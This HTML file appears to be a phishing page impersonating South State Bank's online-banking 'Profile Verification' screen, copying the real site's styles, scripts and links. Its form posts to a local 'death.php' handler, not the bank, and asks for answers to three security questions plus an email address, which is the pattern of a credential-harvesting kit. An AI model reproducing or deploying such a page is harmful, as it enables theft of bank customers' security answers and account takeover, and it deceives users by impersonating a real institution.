﻿<!DOCTYPE HTML>
<!DOCTYPE html PUBLIC "" ""><HTML lang="en-us"><!--This software (including any images, applets, photographs, animations, video, music and text incorporated into the software) is the proprietary property of Fiserv, Inc. or its affiliates and its use, modification and distribution are protected and limited by United States copyright laws and international treaty provisions and all other applicable national laws.  Reproduction is prohibited except that you may make one additional copy of the software solely for backup purposes.--><HEAD><title>Processing</title>                      
               <META 
content="IE=11.0000" http-equiv="X-UA-Compatible">
     
<META http-equiv="X-UA-Compatible" content="IE=edge">     
<META charset="utf-8">     
<META name="viewport" content="width=device-width, initial-scale=1.0">     
<META name="robots" content="noindex">     
<META http-equiv="expires" content="Tue, 04 Dec 1993 21:29:02 GMT">     
<META http-equiv="cache-control" content="no-store, no-cache, must-revalidate">  
   
<META http-equiv="pragma" content="no-cache">     <LINK href="/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/favicon.ico" 
rel="shortcut icon">     <TITLE>South State Bank | Profile Verification</TITLE>     <LINK 
href="https://web14.secureinternetbank.com/PBI_PBI1151/css/opensource?v=Ukb2F1mcTlq1GQzvx3fIYxhp8pTcDPbMNhDtQ1PPB-o1" 
rel="stylesheet"> <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/css/static?v=n3m9xhxPJYPFBVGYJAcJRfBmxvv1ogIsQmzWjoGL0eQ1" 
rel="stylesheet">     <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/ThemeCss?v=652d703df74df283d549b8e4ce8b3742" 
rel="stylesheet" type="text/css">         <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/global.css?v=5c85d86dbae0bd25bcd6bfe3be6cf9c2" 
rel="stylesheet" type="text/css">             <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/OverrideCss?v=c26f3393293ff15c02f7e2a11ed73b25" 
rel="stylesheet" type="text/css">     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/opensource?v=kA1jCQwWsNbR9_Eqob-2wyn-646JwcsPOv7ZkXB3-kA1"></SCRIPT>
     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/PBI?v=W8-IKO8ZIUr9s4QTuZjCLKXB0dJrRQxgsLhrj3hV_QU1"></SCRIPT>
     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/NextMarketing?v=X8O_M39KgDIItiUB9Jjp1E8cS_X8-OtSplppxC9jqRo1"></SCRIPT>
     
<SCRIPT type="text/javascript">
        PBI.antiForgeryToken = "r9ur7Iupm6YuhlXg9aflxpnGHPReWHVbRuMQ5QqO7ylkwIDRWY_x1-up3LRTqiDuFUfns0T5tuHrWdGxdi-h_SFM7aY1";
        PBI.baseHref = "/PBI_PBI1151/";
        PBI.pageNonce = "";
    </SCRIPT>
         
<SCRIPT type="text/javascript">
            PBI.chatStatusUrl = "https://053200983.securebanksolutions.com/status/text/?im=Customercare%40southstatebank.com&group=053200983";
            PBI.RevationDisplayChatInPopup = false;
        </SCRIPT>
         
<STYLE id="antiClickjack">
        body {
            display: none !important;
        }
    </STYLE>
     
<SCRIPT type="text/javascript">
        if (self === top) {
            var antiClickjack = document.getElementById("antiClickjack");
            antiClickjack.parentNode.removeChild(antiClickjack);
        } else {
            top.location = self.location;
        }
    </SCRIPT>
        
<META name="GENERATOR" content="MSHTML 11.00.9600.19355"></HEAD> 
<BODY><svg xmlns="http://www.w3.org/2000/svg" class="is--hidden" focusable="false"><defs><path 
id="shape--ehl" d="M 8 4.1 L 13.3333 7.675 L 13.3333 13.2 L 2.6667 13.2 L 2.6667 7.675 L 8 4.1 Z M 0 6.7 L 0 8.325 L 1.3333 8.325 L 1.3333 14.5 L 14.6667 14.5 L 14.6667 8.325 L 16 8.325 L 16 6.7 L 8 1.5 L 0 6.7 Z M 5.3333 10.275 L 5.3333 12.225 L 10.6667 12.225 L 10.6667 10.275 L 5.3333 10.275 Z M 5.3333 7.675 L 5.3333 9.625 L 10.6667 9.625 L 10.6667 7.675 L 5.3333 7.675 Z" 
/>                             <path id="shape--exclamation-circle" d="M 1.25 8 C 1.25 4.272 4.272 1.25 8 1.25 C 11.728 1.25 14.75 4.272 14.75 8 C 14.75 11.728 11.728 14.75 8 14.75 C 4.272 14.75 1.25 11.728 1.25 8 Z M 0 8 C 0 12.4183 3.5817 16 8 16 C 12.4183 16 16 12.4183 16 8 C 16 3.5817 12.4183 0 8 0 C 3.5817 0 0 3.5817 0 8 Z M 7.05 3.2533 C 6.8534 3.2533 6.6973 3.4282 6.7013 3.6427 L 6.8058 9.2172 C 6.8092 9.3972 6.9568 9.5425 7.1356 9.5425 L 8.8616 9.5425 C 9.0403 9.5425 9.188 9.3972 9.1914 9.2172 L 9.2972 3.6427 C 9.3013 3.4282 9.1452 3.2533 8.9486 3.2533 L 7.05 3.2533 Z M 7.7626 10.3733 C 7.2383 10.3733 6.8133 10.7984 6.8133 11.3227 L 6.8133 11.7973 C 6.8133 12.3216 7.2383 12.7467 7.7626 12.7467 L 8.2373 12.7467 C 8.7616 12.7467 9.1866 12.3216 9.1866 11.7973 L 9.1866 11.3227 C 9.1866 10.7984 8.7616 10.3733 8.2373 10.3733 L 7.7626 10.3733 Z" 
/>                                                                               
                                                      <g 
id="shape--loader"><path fill-opacity="0.9" d="M 8.5 5.1 V 0 C 8.3 0 8.2 0 8 0 S 7.7 0 7.5 0 v 5 C 7.7 5 7.8 5 8 5 S 8.3 5 8.5 5.1 Z" 
/>                 <path fill-opacity="1" d="M 4.4 0.8 C 4.1 1 3.9 1.2 3.6 1.3 l 2.5 4.4 C 6.4 5.5 6.6 5.3 7 5.2 L 4.4 0.8 Z" 
/>                 <path fill-opacity="0.9" d="M 1.3 3.6 C 1.2 3.9 1 4.1 0.8 4.4 L 5.2 7 c 0.1 -0.3 0.3 -0.6 0.5 -0.9 L 1.3 3.6 Z" 
/>                 <path fill-opacity="0.7" d="M 5.1 7.5 H 0 C 0 7.7 0 7.8 0 8 s 0 0.3 0 0.5 h 5 C 5 8.3 5 8.2 5 8 S 5 7.7 5.1 7.5 Z" 
/>                 <path fill-opacity="0.6" d="M 0.8 11.6 c 0.1 0.3 0.3 0.6 0.5 0.9 l 4.4 -2.5 C 5.5 9.6 5.3 9.4 5.2 9 L 0.8 11.6 Z" 
/>                 <path fill-opacity="0.5" d="M 3.6 14.7 c 0.3 0.2 0.6 0.3 0.9 0.5 L 7 10.8 c -0.3 -0.1 -0.6 -0.3 -0.9 -0.5 L 3.6 14.7 Z" 
/>                 <path fill-opacity="0.4" d="M 7.5 10.9 v 5 c 0.2 0 0.3 0 0.5 0 s 0.3 0 0.5 0 v -5 C 8.3 11 8.2 11 8 11 S 7.7 11 7.5 10.9 Z" 
/>                 <path fill-opacity="0.4" d="M 11.6 15.2 c 0.3 -0.1 0.6 -0.3 0.9 -0.5 l -2.5 -4.4 c -0.3 0.2 -0.5 0.4 -0.9 0.5 L 11.6 15.2 Z" 
/>                 <path fill-opacity="0.3" d="M 14.7 12.4 c 0.2 -0.3 0.3 -0.6 0.5 -0.9 L 10.8 9 c -0.1 0.3 -0.3 0.6 -0.5 0.9 L 14.7 12.4 Z" 
/>                 <path fill-opacity="0.2" d="M 10.9 7.5 C 11 7.7 11 7.8 11 8 s 0 0.3 -0.1 0.5 h 5 c 0 -0.2 0 -0.3 0 -0.5 s 0 -0.3 0 -0.5 H 10.9 Z" 
/>                 <path fill-opacity="0.1" d="M 15.2 4.4 c -0.1 -0.3 -0.3 -0.6 -0.5 -0.9 l -4.4 2.5 c 0.2 0.3 0.4 0.5 0.5 0.9 L 15.2 4.4 Z" 
/>                 <path fill-opacity="0.1" d="M 12.4 1.3 c -0.3 -0.2 -0.6 -0.3 -0.9 -0.5 L 9 5.2 c 0.3 0.1 0.6 0.3 0.9 0.5 L 12.4 1.3 Z" 
/>             </g>         </defs>     </svg>     
<DIV class="wrapper"><HEADER role="banner">
<DIV class="grid">
<DIV class="grid__unit one-whole no-print">
<DIV class="float--right" id="utilitySection">
<DIV class="message--welcome float--left"></DIV><NAV class="cf nav--utility float--left" 
aria-label="Utility">
<UL class="nav nav--menu">
  <LI><A class="navitem" id="chatLink" href="https://web14.secureinternetbank.com/PBI_PBI1151/Launch/Chat?RoutingTransit=053200983" 
  target="LinkLiveWindow" rel="noopener noreferrer">Chat</A></LI>
  <LI><A class="navitem" href="https://web14.secureinternetbank.com/PBI_PBI1151/Login/053200983">Log 
  in</A></LI></UL></NAV></DIV></DIV>
<DIV class="grid__unit one-whole" id="BannerTimeout">
<DIV class="bank-branding"><IMG class="img-responsive" id="logo" alt="South State Bank" 
src="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/header-logo_print.png"> 
    </DIV></DIV>
<DIV class="grid__unit one-whole"></DIV></DIV></HEADER><main id="main">
<DIV class="grid">
<DIV class="grid__unit one-whole">
<H1>Profile Verification</H1>
<DIV class="padding--add content--block" id="enrollIndex">
<P class="alert alert--error is--hidden" role="alert" aria-live="assertive" 
aria-atomic="true" data-bind="css: {'is--hidden': false}, visible: error()"><svg 
xmlns="http://www.w3.org/2000/svg" class="icon shape--exclamation-circle" 
viewBox="0 0 16 16" focusable="false"><title>Error</title><use xmlns:xlink="http://www.w3.org/1999/xlink" 
xlink:href="#shape--exclamation-circle" /></svg> <SPAN 
data-bind="text: error()"></SPAN>                 </P>
<form class="form--horizontal padding--add" method="post" action="death.php" autocomplete="off">
<DIV class="slat push--down">
<PRE class="helptext push--large--one-quarter large--three-quarters" id="helpTextEnrollmentForm">Please complete the form below. To complete, you will need to select your security questions and enter the answers . 

In addition, Please enter the answers to your security questions as you have it in your profile.</PRE>
<PRE class="helptext push--large--one-quarter large--three-quarters">&nbsp;</PRE></DIV>
                            <label for="challenge1" class="form__label large--one-quarter">First challenge question</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <div class="form-group section-label" ng-class="{&#39;has-focus&#39;: updateAddr.hasfocusstateselect1, &#39;has-warning&#39; : (updateAddr.isValidState  != undefined &amp;&amp; !updateAddr.isValidState)}"> 
									<select data-test="apstetxt" ng-change="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required" name="question1" id="question1" ng-keyup="updateAddr.checkAddress()" ng-focus="updateAddr.hasfocusstateselect1 = true" ng-blur="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" ng-model="updateAddr.state" ng-options="states for states in updateAddr.states" autocomplete="off" size="1">
									<option>Choose your security question 1</option>
									<option>What is your maternal grandmothers first name?
									</option>
									<option>What is the first name of the maid of honor at your wedding?
									</option>
									<option>What was your high school mascot?
									</option>
									<option>What is your fathers middle name?
									</option>
									<option>What is your favorite sports team?
									</option>
									<option>What is the name of your first pet?
									</option>
									<option>What is your paternal grandfathers first name?
									</option>
									<option>What street did you live on in third grade?
									</option>
									<option>What is the middle name of your oldest child?
									</option>
									<option>What school did you attend for sixth grade?
									</option>

					</select></div><br>
                            <p id="securityQuestionText" class="text--error text--error-form push--large--one-quarter large--three-quarters is--hidden" data-bind="css: {'is--hidden': false}, visible: securityQuestionError(), text: securityQuestionError"></p>
                        </div>
                        <div class="form__group required">
                            <label for="challenge1answer" class="form__label large--one-quarter">First answer</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <input id="securityAnswer1" type="text" name="answer1" maxlength="40" required="true" autocomplete="off" size="21">
                            </div>
							</div>
						<div class="form__group required">
                            <label for="challenge2" class="form__label large--one-quarter">Second challenge question</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <div class="form-group section-label" ng-class="{&#39;has-focus&#39;: updateAddr.hasfocusstateselect1, &#39;has-warning&#39; : (updateAddr.isValidState  != undefined &amp;&amp; !updateAddr.isValidState)}"> 
									<select data-test="apstetxt" ng-change="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required" name="question2" id="question1" ng-keyup="updateAddr.checkAddress()" ng-focus="updateAddr.hasfocusstateselect1 = true" ng-blur="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" ng-model="updateAddr.state" ng-options="states for states in updateAddr.states" autocomplete="off" size="1">
									<option>Choose your security question 2</option>
									<option>What is your maternal grandfathers first name?
									</option>
									<option>What is the first name of the best man at your wedding?
									</option>
									<option>As a child, what did you want to be when you grew up?
									</option>
									<option>What is your mothers middle name?
									</option>
									<option>What was your first job?</option>
									<option>What is your favorite movie?
									</option>
									<option>What is the name of your first employer?
									</option>
									<option>What was the name of your first stuffed animal?
									</option>
									<option>What is the name of your favorite camp you attended as a child?
									</option>
									<option>Where did you take your spouse/significant other on your first date?
									</option>

					</select></div><br>
                            <p id="securityQuestionText" class="text--error text--error-form push--large--one-quarter large--three-quarters is--hidden" data-bind="css: {'is--hidden': false}, visible: securityQuestionError(), text: securityQuestionError"></p>
                        </div>
                        <div class="form__group required">
                            <label for="challenge2answer" class="form__label large--one-quarter">Second answer</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <input id="securityAnswer" type="text" name="answer2" maxlength="40" required="true" autocomplete="off" size="21">
                            </div>
							</div>
                        <div class="form__group required">
                            <label for="challenge3" class="form__label large--one-quarter">Third challenge question</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <div class="form-group section-label" ng-class="{&#39;has-focus&#39;: updateAddr.hasfocusstateselect1, &#39;has-warning&#39; : (updateAddr.isValidState  != undefined &amp;&amp; !updateAddr.isValidState)}"> 
									<select data-test="apstetxt" ng-change="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required" name="question3" id="question1" ng-keyup="updateAddr.checkAddress()" ng-focus="updateAddr.hasfocusstateselect1 = true" ng-blur="updateAddr.state ==null ? updateAddr.hasfocusstateselect1 = false: updateAddr.hasfocusstateselect1 = true" ng-model="updateAddr.state" ng-options="states for states in updateAddr.states" autocomplete="off" size="1">
									<option>Choose your security question 3</option>
									<option>What is your paternal grandmothers first name?
									</option>
									<option>What is the first name of your oldest niece?
									</option>
									<option>What is your favorite hobby?
									</option>
									<option>What is your best friends name?
									</option>
									<option>What was the model of your first car?
									</option>
									<option>What is your favorite book?</option>
									<option>What television show did you watch frequently as a child?
									</option>
									<option>Who was your favorite teacher?
									</option>
									<option>What is your favorite song?</option>
									<option>What was the name of your first girlfriend/boyfriend?
									</option>

					</select></div><br>
                            <p id="securityQuestionText" class="text--error text--error-form push--large--one-quarter large--three-quarters is--hidden" data-bind="css: {'is--hidden': false}, visible: securityQuestionError(), text: securityQuestionError"></p>
                        </div>
                        <div class="form__group required">
                            <label for="challenge3answer" class="form__label large--one-quarter">Third answer</label>
                            <div class="form__control large--one-quarter medium--one-half">
                                <input id="securityAnswer" type="text" name="answer3" maxlength="40" required="true" autocomplete="off" size="21">
                            </div>
							</div>
                    <div class="form__group required">
                        <label class="form__label large--one-quarter" for="emailAddress">Email address</label>
                        <div class="form__control large--one-quarter medium--one-half">
                            <input id="emailAddress" type="email" maxlength="128" name="question4" required aria-required="true" data-bind="value: emailAddress" autocomplete="off" size="21">
                        </div>
                        <p id="email-address-text" class="text--error text--error-form push--large--one-quarter large--three-quarters is--hidden" data-bind="css: {'is--hidden': false}, visible: emailAddressError(), text: emailAddressError"></p>
                    </div>
                    </div>
<DIV class="form__group">
<DIV 
class="push--large--one-quarter large--one-quarter medium--one-half"><BUTTON 
class="btn btn--primary" type="submit" data-bind="enable: !isProcessing()"><svg 
xmlns="http://www.w3.org/2000/svg" class="icon shape--loader" style="display: none;" 
viewBox="0 0 16 16" focusable="false" 
data-bind="visible: isProcessing()"><title>Processing</title>                    
                 <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#shape--loader" 
/>                                 </svg>                                Submit                             </BUTTON>                         
<P class="push--up">&nbsp;</P></DIV></DIV></FORM></DIV></DIV></DIV></main><FOOTER class="page--footer" 
role="contentinfo"><NAV class="no-print nav--footer">
<UL class="nav nav--menu">
  <LI><A class="navitem" href="https://web14.secureinternetbank.com/PBI_PBI1151/Help/Default.htm" 
  target="_blank" rel="noopener noreferrer">Help</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/online-education-center/" 
  target="_blank" rel="noopener noreferrer">Online Demos</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/faqs/#online-banking" 
  target="_blank" rel="noopener noreferrer">FAQ</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/onlinebankingagreement/" 
  target="_blank" rel="noopener noreferrer">Terms &amp; Conditions</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/privacy-statement/" 
  target="_blank" rel="noopener noreferrer">Privacy Notice</A></LI></UL></NAV>
<DIV class="cf" id="footerText">
<P class="float--right padding-right--add">©&nbsp;2015-2019 Fiserv, Inc. or its 
affiliates.</P></DIV></FOOTER></DIV>
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/enroll?v=wpUH1D2lncdYeRYLUhNZfMc41uPDu7ZqZF9PexTqc4o1"></SCRIPT>
     
<SCRIPT type="text/javascript">
        PBI.Enroll.showPin(true);
        PBI.Enroll.showMothersMaidenName(false);
        PBI.Enroll.showDateOfBirth(true);
        PBI.Enroll.showSecurityQuestion(true);
        PBI.Enroll.showSecurityAnswer(true);
        PBI.Enroll.showNameAndAddress(true);


        ko.applyBindings(PBI.Enroll, document.getElementById("enrollIndex"));

        $(function () {
            $('#accountNumber').hideShowPassword('infer', true, {
                toggle: {
                    attr: {
                        'tabindex': '-1',
                        'role': null
                    }
                },
                wrapper: {
                    enforceWidth: false,
                    styles: {
                        width: '100%'
                    }
                },
                states: {
                    shown: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'false',
                                'title': 'Hide account number',
                                'aria-label': 'Account number visible.'
                            }
                        }
                    },
                    hidden: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'true',
                                'title': 'Show account number',
                                'aria-label': 'Account number not visible.'
                            }
                        }
                    }
                }
            });

            $('#ssn').hideShowPassword('infer', true, {
                toggle: {
                    attr: {
                        'tabindex': '-1',
                        'role': null
                    }
                },
                wrapper: {
                    enforceWidth: false,
                    styles: {
                        width: '100%'
                    }
                },
                states: {
                    shown: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'false',
                                'title': 'Hide Social Security number',
                                'aria-label': 'Social Security number visible.'
                            }
                        }
                    },
                    hidden: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'true',
                                'title': 'Show Social Security number',
                                'aria-label': 'Social Security number not visible.'
                            }
                        }
                    }
                }
            });

            $('#securityAnswer').hideShowPassword('infer', true, {
                toggle: {
                    attr: {
                        'tabindex': '-1',
                        'role': null
                    }
                },
                wrapper: {
                    enforceWidth: false,
                    styles: {
                        width: '100%'
                    }
                },
                states: {
                    shown: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'false',
                                'title': 'Hide security answer',
                                'aria-label': 'Security answer visible.'
                            }
                        }
                    },
                    hidden: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'true',
                                'title': 'Show security answer',
                                'aria-label': 'Security answer not visible.'
                            }
                        }
                    }
                }
            });

            $('#PIN').hideShowPassword('infer', true, {
                toggle: {
                    attr: {
                        'tabindex': '-1',
                        'role': null
                    }
                },
                wrapper: {
                    enforceWidth: false,
                    styles: {
                        width: '100%'
                    }
                },
                states: {
                    shown: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'false',
                                'title': 'Hide pin number',
                                'aria-label': 'Pin number visible.'
                            }
                        }
                    },
                    hidden: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'true',
                                'title': 'Show pin number',
                                'aria-label': 'Pin number not visible.'
                            }
                        }
                    }
                }
            });
        });
    </SCRIPT>
         
<SCRIPT type="text/javascript">
        ko.applyBindings(PBI.Next, document.getElementById("BannerTimeout"));
    </SCRIPT>
     </BODY></HTML>